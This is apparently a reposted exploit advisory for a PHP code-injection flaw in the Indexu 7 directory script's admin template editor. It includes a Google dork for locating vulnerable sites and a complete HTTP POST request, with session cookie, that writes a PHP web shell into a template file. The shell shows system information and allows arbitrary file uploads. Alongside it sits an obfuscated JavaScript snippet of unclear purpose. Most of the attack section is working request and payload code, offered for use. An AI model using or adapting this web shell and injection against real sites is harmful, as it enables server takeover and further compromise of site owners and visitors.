facebook facebook twitter rss

Indexu 7 Php Code Injection

Author: Asmar , Published: 30-05-2012
# --------------------------------------- #
Author : HeadSh0t
Title : Indexu 7 Php Code Injection
Date : 5/30/2012
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version : N\A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
The script allow admin to edit file in templates fol. as extention PHP :)
so an attacker can inject some code in any file (EDITED) .
NOTE :
Before you inject code , you should know if the themes is there (./templates/KOMET).
As : http://www.site.com/templates/komet/rows.php
# --------------------------------------- #
3) PoC :

In POST b0x Above Of Live Http Header Put : http://www.site.com/admin/db.php

Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
Cookie: U_AUTHENTICATED=1; __atuvc=7|22; PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8; __utma=111872281.551771833.1338331592.1338331592.1338331592.1; __utmc=111872281; __utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: multipart/form-data; boundary=---------------------------11662147216064
Content-Length: 1157

Send POST Content :

-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
editfile\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="id"\r\n
\r\n
komet\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file"\r\n
\r\n
rows.php\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file_content"\r\n
\r\n
<?php\r\n
echo '<b><br><br>'.php_uname().'<br></b>';\r\n
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';\r\n
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';\r\n
if( $_POST['_upl'] == "Upload" ) {\r\n
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
}\r\n
?>
\
r\n
<script type="text/javascript" language="javascript">ML="Rjnis/e .rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n
-----------------------------11662147216064--\r\n

Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png

Note : Use It On Your Own Risk.

# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Indoushka .
# --------------------------------------- #

Like us on Facebook :